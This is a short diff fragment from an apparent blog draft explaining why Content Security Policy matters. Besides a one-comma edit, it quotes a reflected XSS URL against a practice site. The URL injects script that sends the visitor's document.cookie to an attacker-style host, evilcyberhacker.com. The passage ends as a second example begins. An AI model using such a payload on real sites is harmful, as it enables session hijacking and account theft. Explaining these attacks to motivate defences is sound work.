ndench/ndench.github.io/_drafts/csp-can-see-purpose.md

 http://hack-yourself-first.com/Search?searchTerm=');location.href='http://evilcyberhacker.com?cookies='%2BencodeURIComponent(document.cookie);//'
 ```

-The only reason this attack is possible, is because the browser loads and executes the inline script
+The only reason this attack is possible is because the browser loads and executes the inline script
 tag.
 Another XSS attack could be adding a comment with this as the comment body:

 ```html